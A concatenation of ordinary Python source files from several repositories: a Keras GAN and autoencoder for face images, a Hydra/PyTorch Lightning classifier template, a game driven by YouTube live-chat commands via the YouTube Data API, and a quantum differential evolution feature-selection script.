epoch_padding_size = 8 # len(str(n_epochs-1))
batch_padding_size = 8 # len(str(n_batches-1))
filename = path.join(self.output_path, self.model_name, "outputs", f"output_epoch_{str(i_epoch).rjust(epoch_padding_size, '0')}_" \
f"{str(i_batch).rjust(batch_padding_size, '0')}.png")
fig.savefig(filename)
if disable_plot == False:
plt.show(fig)
plt.close(fig)
def train_gan(self, dataset_size,
n_dim=100, start_epoch=0, n_epochs=100, n_batch=128, n_eval=2000, eval_samples=100, n_plot=10,
plot_size=9, type='face', disable_plot=False):
# diskriminator updatujeme so vstupmi v pocte n_batch, pol. real, pol. fake
self.batch_size = n_batch
half_batch = n_batch // 2
batches = dataset_size // half_batch
init_time = datetime.datetime.now()
for epoch in range(start_epoch, n_epochs):
start_n = 0 # pozicia v datasete pre epoch
for i in range(batches):
print(f"[Epoch {epoch}] Batch {i}/{batches}")
# vstup a target pre diskriminator
x_real, y_real = self.discriminator.generate_real_samples(start_n, half_batch, type=self.discriminator.dataset_type)
input_points = random_latent_points(n_dim, half_batch)
x_fake, y_fake = self.generator.generate_fake_samples(input_points, n_dim, half_batch)
d_loss_real, _ = self.discriminator.model.train_on_batch(x_real, y_real)
d_loss_fake, _ = self.discriminator.model.train_on_batch(x_fake, y_fake)
# vstup a target pre generator
x_gan = random_latent_points(n_dim, n_batch)
y_gan = np.ones((n_batch, 1))
g_loss = self.model.train_on_batch(x_gan, y_gan)
if i % n_eval == 0:
losses = (d_loss_real, d_loss_fake, g_loss)
if self.inputs.any() == None:
inputs = random_latent_points(n_dim, plot_size)
else:
inputs = self.inputs
self.eval_performance(losses, init_time,
n_dim, epoch, n_epochs, i, batches, inputs, n=eval_samples, n_plot=n_plot,
plot_size=plot_size, disable_plot=disable_plot)
start_n += half_batch
class Discriminator:
def __init__(self, default_width, default_height, n_filters=128, pixel_depth=3, dataset_path='', dataset_type='face', lr=0.0002):
# edit kernel size, layer sizes, bigger dropouts, default alpha on relu
self.dataset_path = dataset_path
self.dataset_type = dataset_type
self.height = default_height
self.width = default_width
self.pixel_depth = pixel_depth
self.model = Sequential()
first_layer = Conv2D( # vstupne np polia su sice 3d, ale convolution sa nad nimi robi 2d
filters=n_filters,
kernel_size=(5, 5), # ^^
strides=(2, 2),
padding='same',
input_shape=(self.height, self.width, pixel_depth)
)
first_activation = LeakyReLU(alpha=0.2)
first_dropout = Dropout(0.3)
self.model.add(first_layer)
self.model.add(first_activation)
self.model.add(first_dropout)
current_size = self.height // 2
while current_size > 4:
new_layer = Conv2D( # vstupne np polia su sice 3d, ale convolution sa nad nimi robi 2d
filters=n_filters / 2,
kernel_size=(5, 5), # ^^
strides=(2, 2),
padding='same'
)
new_activation = LeakyReLU(alpha=0.2)
new_dropout = Dropout(0.3)
self.model.add(new_layer)
self.model.add(new_activation)
self.model.add(new_dropout)
current_size /= 2
flatten = Flatten()
output_dense = Dense(
units=1, # real/fake klasifikacia
activation='sigmoid'
)
self.model.add(flatten)
self.model.add(output_dense)
# model.summary()
adam = Adam(learning_rate=lr, beta_1=0.5)
self.model.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy']) # metrics kvoli evaluation
def generate_real_face_samples(self, i_start, n):
picked_sample_list = list()
for i_image in range(i_start, i_start + n):
chosen_sample = i_image
chosen_folder = chosen_sample - (chosen_sample % 1000)
folder_string = str(chosen_folder)
image_string = str(chosen_sample)
folder_string = folder_string.rjust(5, '0') # padding
image_string = image_string.rjust(5, '0') # padding
full_path = path.join(self.dataset_path, folder_string, image_string + '.png')
with Image.open(full_path) as image:
image_array = np.array(image)
image_array = resize(image_array, (self.height, self.width))
picked_sample_list.append(image_array)
# after loading n samples:
X = np.array(picked_sample_list)
y = np.ones((n, 1))
return X, y
def generate_real_samples(self, i_start, n, type='face'):
loader = None
if type == 'face':
loader = self.generate_real_face_samples
else:
print("Unknown dataset.")
return None
return loader(i_start, n)
def generate_real_face_random(self, n, i_min=0, i_max=70000):
picked_sample_list = list()
for i_image in range(n):
chosen_sample = random.choice(range(i_min, i_max))
chosen_folder = chosen_sample - (chosen_sample % 1000)
folder_string = str(chosen_folder)
image_string = str(chosen_sample)
folder_string = folder_string.rjust(5, '0') # padding
image_string = image_string.rjust(5, '0') # padding
full_path = path.join(self.dataset_path, folder_string, image_string + '.png')
with Image.open(full_path) as image:
image_array = np.array(image)
image_array = resize(image_array, (self.height, self.width))
picked_sample_list.append(image_array)
X = np.array(picked_sample_list)
y = np.ones((n, 1))
return X, y
def generate_real_samples_random(self, n, i_min=0, i_max=70000, type='face'):
loader = None
if type == 'face':
loader = self.generate_real_face_random
else:
print("Unknown dataset.")
return None
return loader(n)
class Generator:
def __init__(self, default_height, default_width, n_dim=100, n_paralell_samples=64, pixel_depth=3, init_size=8):
#changes:
# leakyrelu to default alpha, use_bias=False, added batch norms, kernel size to 5, add initial conv2dtransp
# dense size 128 -> 256, first conv 128, then all 64
self.height = default_height
self.width = default_width
self.model = Sequential()
first_layer = Dense(
units=init_size * init_size * 256,
input_dim=n_dim,
# use_bias=False,
# activation='linear'
)
# first_norm = BatchNormalization()
first_activation = LeakyReLU()
reshape = Reshape((init_size, init_size, 256))
#init_conv = Conv2DTranspose( # alternativne UpSample2D + Conv2D, zvacsenie a domyslenie, toto ich spaja do 1
# filters=n_paralell_samples,
# kernel_size=(5, 5),
# strides=(1, 1),
# padding='same',
# use_bias=False
#)
# init_norm = BatchNormalization()
#init_activation = LeakyReLU()
self.model.add(first_layer)
# self.model.add(first_norm)
self.model.add(first_activation)
self.model.add(reshape)
#self.model.add(init_conv)
# self.model.add(init_norm)
#self.model.add(init_activation)
current_size = init_size
while current_size < self.height:
new_layer = Conv2DTranspose( # alternativne UpSample2D + Conv2D, zvacsenie a domyslenie, toto ich spaja do 1
filters=n_paralell_samples,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
# use_bias=False
)
# new_norm = BatchNormalization()
new_activation = LeakyReLU()
self.model.add(new_layer)
# self.model.add(new_norm)
self.model.add(new_activation)
current_size *= 2
output_layer = Conv2D(
filters=pixel_depth, # rgb info
kernel_size=(3, 3),
activation='tanh', # specialna akt. funk. pre rgb
padding='same',
# use_bias=False
)
self.model.add(output_layer)
def generate_fake_samples(self, x_input, n_dim, n): # [-1,1]
X = self.model.predict(x_input)
y = np.zeros((n, 1))
return X, y
def rgb_to_float(rgb_value):
zero_to_one = rgb_value / 256.0
# normalized = (zero_to_one - 0.5) * 2
return zero_to_one
def float_to_rgb(float_value):
# converted_float = (float_value / 2) + 0.5
rgb_value = (float_value * 256)
rgb_value = np.where(rgb_value > 255, 255, rgb_value)
rgb_value = np.where(rgb_value < 0, 0, rgb_value).astype('uint8')
return rgb_value
def random_latent_points(n_dim, n):
latent_vectors = np.random.randn(n_dim * n) # n čísel z gauss. distrib.
latent_vectors = latent_vectors.reshape(n, n_dim)
return latent_vectors
def generate_and_plot(generator, n_dim, inputs, n):
n_factor = int(math.sqrt(n))
x_plt, _ = generator.generate_fake_samples(inputs, n_dim, n)
px = 1 / plt.rcParams['figure.dpi']
fig = plt.figure(frameon=False, figsize=((n_factor * generator.width) * px, (n_factor * generator.height) * px))
for i in range(n_factor * n_factor): # ZMEN ABY NAMIESTO 4,5 BOLI FACTORS
# define subplot
ax = fig.add_subplot(n_factor, n_factor, 1 + i)
ax.axis('off')
ax.imshow(float_to_rgb(x_plt)[i], interpolation='nearest')
plt.tight_layout()
fig.subplots_adjust(wspace=0, hspace=0, left=0, right=1, top=1, bottom=0)
return fig
def latent_transition(pointA, pointB, n_dim=100, n_steps=100):
transition_points = np.empty([n_steps, n_dim])
for i in range(n_steps):
step = (-math.cos(i / n_steps * math.pi) * 0.5 + 0.5) # input value (t) for interp
for dim in range(n_dim):
transition_points[i][dim] = (pointB[dim] - pointA[dim]) * step + pointA[dim] # cosine interpolation
return transition_points
class Encoder:
def __init__(self, default_width, default_height, n_filters=64, pixel_depth=3, dataset_path='', dataset_type='face'):
self.dataset_path = dataset_path
self.dataset_type = dataset_type
self.height = default_height
self.width = default_width
self.model = Sequential()
first_layer = Conv2D(
filters=n_filters,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
input_shape=(self.height, self.width, pixel_depth),
activation='relu',
)
self.model.add(first_layer)
current_size = self.height // 2
while current_size > 4:
new_layer = Conv2D( # vstupne np polia su sice 3d, ale convolution sa nad nimi robi 2d
filters=n_filters,
kernel_size=(4, 4), # ^^
strides=(2, 2),
padding='same',
activation='relu',
)
self.model.add(new_layer)
current_size /= 2
final_layer = Conv2D(
filters=256,
kernel_size=(4, 4),
strides=(1, 1),
padding='same',
input_shape=(self.height, self.width, pixel_depth),
activation='relu',
)
self.model.add(final_layer)
flatten = Flatten()
output_dense = Dense(
units=100, # result vector
activation='tanh',
)
self.model.add(flatten)
self.model.add(output_dense)
def generate_real_face_samples(self, i_start, n, dataset_path="dataset_download/thumbnails128x128"):
picked_sample_list = list()
for i_image in range(i_start, i_start + n):
chosen_sample = i_image
chosen_folder = chosen_sample - (chosen_sample % 1000)
folder_string = str(chosen_folder)
image_string = str(chosen_sample)
folder_string = folder_string.rjust(5, '0') # padding
image_string = image_string.rjust(5, '0') # padding
full_path = path.join(self.dataset_path, folder_string, image_string + '.png')
with Image.open(full_path) as image:
image_array = np.array(image)
image_array = resize(image_array, (self.height, self.width))
picked_sample_list.append(image_array)
# after loading n samples:
X = np.array(picked_sample_list)
y = np.ones((n, 1))
return X, y
class FMAE:
def __init__(self, encoder, generator, height, width, lr=0.001):
self.height = height
self.width = width
generator.model.trainable = False
self.model = Sequential()
self.model.add(encoder.model)
self.model.add(generator.model)
self.model.layers[0]._name = 'Encoder'
self.model.layers[1]._name = 'Generator'
adam = Adam(learning_rate=lr, beta_1=0.5)
self.model.compile(loss='binary_crossentropy', optimizer=adam, metrics='accuracy')
self.encoder = encoder
self.generator = generator
def train_fmae(self, input_image, n_steps):
init_time = datetime.datetime.now()
for epoch in range(0, n_steps):
if epoch % 100 == 0:
print("Epoch", epoch)
decoded_image = self.model.predict(input_image)
fig = plt.imshow(decoded_image[0], interpolation='nearest')
plt.show(fig)
plt.close()
self.model.fit(input_image, input_image, verbose=0)
def train_fmae_on_dataset(self, input_image, n_epochs, dataset_size=70000, batch_size=100, n_eval=100, plot_size=10, disable_plot=False):
init_time = datetime.datetime.now()
n_batches = dataset_size // batch_size
for epoch in range(0, n_epochs):
start_n = 0
print("Epoch", epoch)
for batch in range(0, n_batches):
samples, _ = self.encoder.generate_real_face_samples(start_n, batch_size, dataset_path="dataset_download/thumbnails128x128")
#inputs = random_latent_points(100, batch_size)
#samples_, _ = self.generator.generate_fake_samples(inputs, 100, batch_size)
self.model.fit(samples, samples, verbose=0)
if batch % n_eval == 0:
print("Batch", batch)
# filename = path.join(self.output_path, self.model_name, "outputs", f"output_epoch_{str(epoch).rjust(5, '0')}_" \
# f"{str(batch).rjust(5, '0')}.png")
real_image, _ = self.encoder.generate_real_face_samples(start_n, 1, dataset_path="dataset_download/thumbnails128x128")
decoded_real_image = self.model.predict(real_image)
decoded_input_image = self.model.predict(input_image)
fig = plt.imshow(decoded_real_image[0], interpolation='nearest')
if disable_plot == False:
plt.show(fig)
plt.close()
fig = plt.imshow(decoded_input_image[0], interpolation='nearest')
if disable_plot == False:
plt.show(fig)
plt.close()
start_n += batch_size
``` |
{
"source": "2021L-ZZSN/template",
"score": 2
} |
#### File: zzsn2021/configs/register.py
```python
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Any, Dict, Iterator, List, Optional, cast
import omegaconf
from hydra.conf import HydraConf, RunDir, SweepDir
from hydra.core.config_store import ConfigStore
from omegaconf import SI, DictConfig
from omegaconf.dictconfig import DictConfig
from omegaconf.omegaconf import MISSING
# isort: split
from .experiment import ExperimentSettings
from .lightning import LightningSettings
from .optim import OPTIMIZERS, SCHEDULERS, OptimSettings
@dataclass
class Hydra(HydraConf):
run: RunDir = RunDir("${output_dir}")
sweep: SweepDir = SweepDir(".", "${output_dir}")
@dataclass
class Config():
"""
Top-level Hydra config class.
"""
defaults: List[Any] = field(default_factory=lambda: [
{'experiment': 'fashion'},
{'optim': 'adam'},
{'override hydra/job_logging': 'rich'},
{'override hydra/hydra_logging': 'rich'},
])
# Path settings
data_dir: str = SI("${oc.env:DATA_DIR}")
output_dir: str = SI("${oc.env:RUN_DIR}")
# Runtime configuration
hydra: Hydra = Hydra()
pl: LightningSettings = LightningSettings()
# Experiment settings --> experiment/*.yaml
experiment: ExperimentSettings = MISSING
# Optimizer & scheduler settings --> optim/*.yaml
optim: OptimSettings = MISSING
# wandb metadata
notes: Optional[str] = None
tags: Optional[List[str]] = None
def register_configs():
"""
Register configuration options in the main ConfigStore.instance().
The term `config` is used for a StructuredConfig at the root level (normally switchable with `-cn`
flag in Hydra, here we use only one default config). Fields of the main config use StructuredConfigs
with class names ending in `Settings`. `Conf` suffix is used for external schemas provided by
the `hydra-torch` package for PyTorch/PyTorch Lightning integration, e.g. `AdamConf`.
"""
cs = ConfigStore.instance()
# Main config
cs.store(name='default', node=DictConfig(Config()))
# Config groups with defaults, YAML files validated by Python structured configs
# e.g.: `python -m zzsn2021.main experiment=fashion`
cs.store(group='experiment', name='schema_experiment', node=ExperimentSettings)
cs.store(group='optim', name='schema_optim', node=OptimSettings)
# Specific schemas, YAML files should inherit them as a default, e.g:
# defaults:
# - schema_optim
# - schema_optim_adam
for key, node in OPTIMIZERS.items():
name = f'schema_optim_{key}'
cs.store(group='optim', name=name, node=node, package='optim.optimizer')
for key, node in SCHEDULERS.items():
name = f'schema_optim_lrscheduler_{key}'
cs.store(group='optim', name=name, node=node, package='optim.scheduler')
def _get_tags(cfg: dict[str, Any]) -> Iterator[str]:
for key, value in cfg.items():
if isinstance(value, dict):
yield from _get_tags(cast(Dict[str, Any], value))
if key == '_tags_':
if isinstance(value, list):
for v in cast(List[str], value):
yield v
else:
if value is not None:
value = cast(str, value)
yield value
def get_tags(cfg: DictConfig):
"""
Extract all tags from a nested DictConfig object.
"""
cfg_dict = cast(Dict[str, Any], omegaconf.OmegaConf.to_container(cfg, resolve=True))
if 'tags' in cfg_dict:
cfg_dict['_tags_'] = cfg_dict['tags']
return list(_get_tags(cfg_dict))
```
#### File: zzsn2021/systems/classifier.py
```python
from __future__ import annotations
import random
from typing import Any, Tuple, Union
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn as nn
import torch.nn.functional as F
from hydra.utils import instantiate
from pytorch_lightning.loggers.base import LoggerCollection
from pytorch_lightning.loggers.wandb import WandbLogger
from pytorch_lightning.metrics import Accuracy
from rich import print
from torch.optim.lr_scheduler import _LRScheduler
from torch.optim.optimizer import Optimizer
from wandb.sdk.wandb_run import Run
from ..configs import Config
from ..models import ConvNet
class ImageClassifier(pl.LightningModule):
"""
Basic image classifier.
"""
def __init__(self, cfg: Config) -> None:
super().__init__() # type: ignore
self.logger: Union[LoggerCollection, WandbLogger, Any]
self.wandb: Run
self.cfg = cfg
self.model = ConvNet(self.cfg)
self.criterion = nn.CrossEntropyLoss()
# Metrics
self.train_acc = Accuracy()
self.val_acc = Accuracy()
# -----------------------------------------------------------------------------------------------
# Default PyTorch Lightning hooks
# -----------------------------------------------------------------------------------------------
def on_fit_start(self) -> None:
"""
Hook before `trainer.fit()`.
Attaches current wandb run to `self.wandb`.
"""
if isinstance(self.logger, LoggerCollection):
for logger in self.logger: # type: ignore
if isinstance(logger, WandbLogger):
self.wandb = logger.experiment # type: ignore
elif isinstance(self.logger, WandbLogger):
self.wandb = self.logger.experiment # type: ignore
def on_save_checkpoint(self, checkpoint: dict[str, Any]) -> None:
"""
Hook on checkpoint saving.
Adds config and RNG states to the checkpoint file.
"""
checkpoint['cfg'] = self.cfg
checkpoint['rng_torch'] = torch.default_generator.get_state()
checkpoint['rng_numpy'] = np.random.get_state()
checkpoint['rng_random'] = random.getstate()
def on_load_checkpoint(self, checkpoint: dict[str, Any]) -> None:
"""
Hook on checkpoint loading.
Loads RNG states from the checkpoint file.
"""
torch.default_generator.set_state(checkpoint['rng_torch'])
np.random.set_state(checkpoint['rng_numpy'])
random.setstate(checkpoint['rng_random'])
# ----------------------------------------------------------------------------------------------
# Optimizers
# ----------------------------------------------------------------------------------------------
def configure_optimizers(self) -> Union[Optimizer, Tuple[List[Optimizer], List[_LRScheduler]]]: # type: ignore
"""
Define system optimization procedure.
See https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html#configure-optimizers.
Returns
-------
Union[Optimizer, Tuple[List[Optimizer], List[_LRScheduler]]]
Single optimizer or a combination of optimizers with learning rate schedulers.
"""
optimizer: Optimizer = instantiate(
self.cfg.optim.optimizer,
params=self.parameters(),
_convert_='all'
)
if self.cfg.optim.scheduler is not None:
scheduler: _LRScheduler = instantiate( # type: ignore
self.cfg.optim.scheduler,
optimizer=optimizer,
_convert_='all'
)
print(optimizer, scheduler)
return [optimizer], [scheduler]
else:
print(optimizer)
return optimizer
# ----------------------------------------------------------------------------------------------
# Forward
# ----------------------------------------------------------------------------------------------
def forward(self, x: torch.Tensor) -> torch.Tensor: # type: ignore
"""
Forward pass of the whole system.
In this simple case just calls the main model.
Parameters
----------
x : torch.Tensor
Input tensor.
Returns
-------
torch.Tensor
Output tensor.
"""
return self.model(x)
# ----------------------------------------------------------------------------------------------
# Loss
# ----------------------------------------------------------------------------------------------
def calculate_loss(self, outputs: torch.Tensor, targets: torch.Tensor) -> torch.Tensor:
"""
Compute loss value of a batch.
In this simple case just forwards computation to default `self.criterion`.
Parameters
----------
outputs : torch.Tensor
Network outputs with shape (batch_size, n_classes).
targets : torch.Tensor
Targets (ground-truth labels) with shape (batch_size).
Returns
-------
torch.Tensor
Loss value.
"""
return self.criterion(outputs, targets)
# ----------------------------------------------------------------------------------------------
# Training
# ----------------------------------------------------------------------------------------------
def training_step(self, batch: list[torch.Tensor], batch_idx: int) -> dict[str, torch.Tensor]: # type: ignore
"""
Train on a single batch with loss defined by `self.criterion`.
Parameters
----------
batch : list[torch.Tensor]
Training batch.
batch_idx : int
Batch index.
Returns
-------
dict[str, torch.Tensor]
Metric values for a given batch.
"""
inputs, targets = batch
outputs = self(inputs) # basically equivalent to self.forward(data)
loss = self.calculate_loss(outputs, targets)
self.train_acc(F.softmax(outputs, dim=1), targets)
return {
'loss': loss,
# no need to return 'train_acc' here since it is always available as `self.train_acc`
}
def training_epoch_end(self, outputs: list[Any]) -> None:
"""
Log training metrics.
Parameters
----------
outputs : list[Any]
List of dictionaries returned by `self.training_step` with batch metrics.
"""
step = self.current_epoch + 1
metrics = {
'epoch': float(step),
'train_acc': float(self.train_acc.compute().item()),
}
# Average additional metrics over all batches
for key in outputs[0]:
metrics[key] = float(self._reduce(outputs, key).item())
self.logger.log_metrics(metrics, step=step)
def _reduce(self, outputs: list[Any], key: str):
return torch.stack([out[key] for out in outputs]).mean().detach()
# ----------------------------------------------------------------------------------------------
# Validation
# ----------------------------------------------------------------------------------------------
def validation_step(self, batch: list[torch.Tensor], batch_idx: int) -> dict[str, Any]: # type: ignore
"""
Compute validation metrics.
Parameters
----------
batch : list[torch.Tensor]
Validation batch.
batch_idx : int
Batch index.
Returns
-------
dict[str, torch.Tensor]
Metric values for a given batch.
"""
inputs, targets = batch
outputs = self(inputs) # basically equivalent to self.forward(data)
self.val_acc(F.softmax(outputs, dim=1), targets)
return {
# 'additional_metric': ...
# no need to return 'val_acc' here since it is always available as `self.val_acc`
}
def validation_epoch_end(self, outputs: list[Any]) -> None:
"""
Log validation metrics.
Parameters
----------
outputs : list[Any]
List of dictionaries returned by `self.validation_step` with batch metrics.
"""
step = self.current_epoch + 1 if not self.trainer.running_sanity_check else self.current_epoch # type: ignore
metrics = {
'epoch': float(step),
'val_acc': float(self.val_acc.compute().item()),
}
# Average additional metrics over all batches
for key in outputs[0]:
metrics[key] = float(self._reduce(outputs, key).item())
self.logger.log_metrics(metrics, step=step)
``` |
{
"source": "2021myj-j/share-game",
"score": 3
} |
#### File: share_game/core/confing.py
```python
import yaml
import os
from core.utils import find_files
class ReadConfing():
def __init__(self, path: str) -> None:
self.data = yaml.load(open(path, "r", encoding="UTF-8"), Loader=yaml.FullLoader)
def getconfing(self, ver_name: str):
return self.data[ver_name]
def find_confing_path(confing_paths: list):
if confing_paths:
if len(confing_paths) > 1:
for i in confing_paths:
if "share" in i and "game" in i:
return i
else:
return confing_paths[0]
confing_paths = find_files(os.path.abspath(".."), "confing.yaml")
if not confing_paths:
confing_paths = find_files(os.path.abspath(".."), "key.yaml")
confing_path = find_confing_path(confing_paths)
if not confing_path:
class MissingKeyOrConfingError(Exception):
def __str__(self) -> str:
return "Missing key file or confing file"
raise MissingKeyOrConfingError
readConfing = ReadConfing(confing_path)
YOTUBER_URL = readConfing.getconfing("YOTUBER_URL")
YOTUBER_API_KEY = readConfing.getconfing("YOTUBER_API_KEY")
if __name__ == "__main__":
print(confing_path)
print(YOTUBER_URL)
print(YOTUBER_API_KEY)
# 旧find_confing_path()関数
"""
def find_confing_path():
import os
def fing_confing(listdir, path: str):
if "confing.yaml" in listdir:
return os.path.join(path, "confing.yaml")
elif "key.yaml" in listdir:
return os.path.join(path, "key.yaml")
listdir = os.listdir(".")
abspath: str = os.path.abspath(".")
confing_path = None
if "share_game" in listdir:
listdir_share_game = os.listdir("share_game")
confing_path = fing_confing(
listdir_share_game, os.path.join(abspath, "share_game")
)
elif "share-game" in listdir:
listdir_share_game = os.listdir("share-game")
confing_path = fing_confing(
listdir_share_game, os.path.join(abspath, "share-game")
)
if not confing_path:
confing_path = fing_confing(listdir, abspath)
if confing_path:
return confing_path
else:
class MissingKeyOrConfingError(Exception):
def __str__(self) -> str:
return "Missing key file or confing file"
raise MissingKeyOrConfingError
"""
```
#### File: share_game/core/youtube_api.py
```python
import requests
import datetime
class YoutubeLiveChat():
def __init__(self, youtuber_url, youtuber_api_key, interval=10) -> None:
"""
Unit of interval: second
"""
self.youtuber_api_key = youtuber_api_key
self.chat_id = self.get_chat_id(youtuber_url)
if not self.chat_id:
class NoneError(Exception):
def __str__(self) -> str:
return "This value can NOT be None!"
raise NoneError
self.interval = interval
self.previous_token_time = datetime.datetime.now() - datetime.timedelta(seconds=self.interval + 1) # yapf: disable
self.page_token = self.get_chat_message_next_page_token()
def get_chat_id(self, yt_url: str):
'''
from qiita @iroiro_bot
https://qiita.com/iroiro_bot/items/ad0f3901a2336fe48e8f
https://developers.google.com/youtube/v3/docs/videos/list?hl=ja
'''
video_id = yt_url.replace('https://www.youtube.com/watch?v=', '')
print('video_id : ', video_id)
url = 'https://www.googleapis.com/youtube/v3/videos'
params = {
'key': self.youtuber_api_key,
'id': video_id,
'part': 'liveStreamingDetails'
}
data = requests.get(url, params=params).json()
try:
liveStreamingDetails = data['items'][0]['liveStreamingDetails']
except BaseException:
print('NO live')
return None
if 'activeLiveChatId' in liveStreamingDetails.keys():
chat_id = liveStreamingDetails['activeLiveChatId']
print('get_chat_id done!')
else:
chat_id = None
print('NOT live')
return chat_id
def get_chat_message_row_data(self, page_token=None, part='id,snippet,authorDetails'):
# inputの方がサガサイでやりやすそう
interval = datetime.datetime.now() - self.previous_token_time
if interval.seconds < self.interval:
return None
# print(self.interval)
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
params = {
'key': self.youtuber_api_key,
'liveChatId': self.chat_id,
'part': 'id,snippet,authorDetails',
}
if page_token:
params['pageToken'] = page_token
self.previous_token_time = datetime.datetime.now()
res = requests.get(url, params=params).json()
# print(res)
if "error" in res:
return None
return res
def get_chat_message_next_page_token(self):
chat_message_row_data = self.get_chat_message_row_data()
if not chat_message_row_data:
return None
return chat_message_row_data["nextPageToken"]
def format_chat_message_row_data(self, data):
if not data:
return None
comments = []
try:
for item in data['items']:
channelId = item['snippet']['authorChannelId']
msg = item['snippet']['displayMessage']
published_at = item['snippet']["publishedAt"]
usr = item['authorDetails']['displayName']
# 要求されたもの
comment = {
"author_channel_id": channelId,
"author_name": usr,
"display_message": msg,
"published_at": published_at
}
comments.append(comment)
except BaseException:
return None
res = {"next_page_token": data['nextPageToken'], "comments": comments}
return res
# yapf: disable
def get_formatted_chat_message_data(self, page_token=None, part='id,snippet,authorDetails'):
chat_message_row_data = self.get_chat_message_row_data(page_token=page_token, part=part)
formatted_chat_message_data = self.format_chat_message_row_data(chat_message_row_data)
return formatted_chat_message_data
# yapf: enable
def get_next_chat_message(self, part='id,snippet,authorDetails'):
if not self.page_token:
self.page_token = self.get_chat_message_next_page_token()
next_chat_message = self.get_formatted_chat_message_data(page_token=self.page_token, part=part) # yapf: disable
if not next_chat_message:
return
self.page_token = next_chat_message["next_page_token"]
return next_chat_message
if __name__ == '__main__':
import time
import confing
print("\n\n\n\n\n")
youtube_live_chat = YoutubeLiveChat(confing.YOTUBER_URL, confing.YOTUBER_API_KEY)
# print(youtube_live_chat.get_chat_id(confing.YOTUBER_URL))
print(youtube_live_chat.get_next_chat_message())
time.sleep(5)
print(youtube_live_chat.get_next_chat_message())
time.sleep(6)
print(youtube_live_chat.get_next_chat_message())
# yt_url = input('Input YouTube URL > ')
# chat_id = get_chat_id(yt_url)
# chat_id = get_chat_id(confing.YOTUBER_URL)
# url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
# params = {
# 'key': confing.YOTUBER_API_KEY,
# 'liveChatId': chat_id,
# 'part': 'id,snippet,authorDetails'
# }
# pageToken = None
# if type(pageToken) == str:
# params['pageToken'] = pageToken
# data = requests.get(url, params=params).json()
# print(data)
"""
chat_id = get_chat_id(confing.YOTUBER_URL)
data = get_chat_message(confing.YOTUBER_API_KEY, chat_id)
format_data = format_row_yotube_data(data)
print(format_data)
"""
# data = [
# {
# "author_channel_id": "5555",
# "author_name": "sei",
# "display_message": "楽しい!!!!!"
# },
# {
# "author_channel_id": "5555",
# "author_name": "sei",
# "display_message": "楽しい!!!!!"
# },
# {
# "author_channel_id": "5555",
# "author_name": "sei",
# "display_message": "楽しい!!!!!"
# }
# ]
```
#### File: share-game/share_game/main.py
```python
from typing import List, Tuple, Optional
import datetime
from game.game import App
from core import confing
from core.youtube_api import YoutubeLiveChat
from core.utils import ChatToCommand
class App(App):
def __init__(self, debug_mode=False):
self.frame_counter = 0
"""
command_list_per_s: List[Tuple[bool , bool , bool ]]
command_list_per_s: List[Tuple[a_pressed, b_pressed, y_pressed]]
"""
self.command_list: Optional[List[Tuple[bool, bool, bool]]] = []
# self.command_list = [(False, True) for i in range(3)]
self.youtube_live_chat = YoutubeLiveChat(
confing.YOTUBER_URL, confing.YOTUBER_API_KEY, interval=1
)
self.chat_to_command = ChatToCommand()
self.previous_token_time = datetime.datetime.now()
super().__init__(debug_mode)
def update(self):
self.frame_counter = self.frame_counter % 30
self.frame_counter += 1
self.get_command()
self.input_command(1)
super().update()
def input_command(self, step=1):
if step < 1 or step > 30:
class OutStepRange(Exception):
def __str__(self) -> str:
return "out of step randge. The range of steps is 1-30."
raise OutStepRange
if self.frame_counter % step == step - 1 and self.command_list:
self.player.a_pressed, self.player.d_pressed, self.player.y_pressed = self.command_list.pop(0) # yapf: disable
def get_command(self):
def count_interval():
interval = datetime.datetime.now() - self.previous_token_time
self.previous_token_time = datetime.datetime.now()
return interval
next_chat_message = self.youtube_live_chat.get_next_chat_message()
if not next_chat_message or (len(next_chat_message["comments"]) == 0):
if next_chat_message:
print("---empty! %d s passed since last token---" % count_interval().seconds)
return
is_y_pressed = False
if self.chat_to_command.data_set_to_num_of_command(next_chat_message)["y"] > 0:
is_y_pressed = True
if is_y_pressed:
self.command_list.append(self.chat_to_command.str_to_command("y"))
num_of_command_list = self.chat_to_command.data_to_num_of_command(next_chat_message) # yapf: disable
for i in num_of_command_list:
if i["vec2"] > 0:
for j in range(i["vec2"]):
self.command_list.append(self.chat_to_command.str_to_command("a"))
elif i["vec2"] < 0:
for j in range(-i["vec2"]):
self.command_list.append(self.chat_to_command.str_to_command("d"))
print("---message follows, %d s passed since last token---" % count_interval().seconds)
for i in next_chat_message["comments"]:
display_message = i["display_message"]
print(display_message)
# first_valid_command = self.chat_to_command.first_valid_command_str_to_command(display_message) # yapf: disable
# if first_valid_command:
# self.command_list.append(first_valid_command)
if __name__ == "__main__":
# youtube_live_chat = YoutubeLiveChat(confing.YOTUBER_URL, confing.YOTUBER_API_KEY)
App()
``` |
{
"source": "2021rahul/Feature_Subset_Selection_Genetic_Algorithm",
"score": 3
} |
#### File: Feature_Subset_Selection_Genetic_Algorithm/PYTHON_CODE/main.py
```python
import config
import quantum_diff_evol
def elitist_quantum_diff_evol():
print("Initializing population")
pop_qubits = quantum_diff_evol.pop_init()
print("Observing population")
pop_obs_qubits = quantum_diff_evol.pop_observe(pop_qubits)
print("Calculating Initial Accuracy")
qubits_accuracy, qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_qubits)
for iter in range(0, config.EQDE_MAXITER):
print("QDE iteration start")
print("Iteration Number: ", iter)
print("Calculating Original Accuracy")
qubits_accuracy, qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_qubits)
print("Mutating Population")
pop_mut_qubits = quantum_diff_evol.pop_mutation(pop_qubits)
print("Population crossover")
pop_cross_qubits = quantum_diff_evol.pop_crossover(pop_qubits, pop_mut_qubits, qubits_accuracy)
pop_obs_cross_qubits = quantum_diff_evol.pop_observe(pop_cross_qubits)
print("Calculating Crossover Accuracy")
cross_qubits_accuracy, cross_qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_cross_qubits)
print("Population Selection")
pop_qubits, pop_obs_qubits = quantum_diff_evol.pop_selection(pop_qubits, pop_obs_qubits, qubits_accuracy, pop_cross_qubits, pop_obs_cross_qubits, cross_qubits_accuracy)
final_pop_qubits = pop_qubits
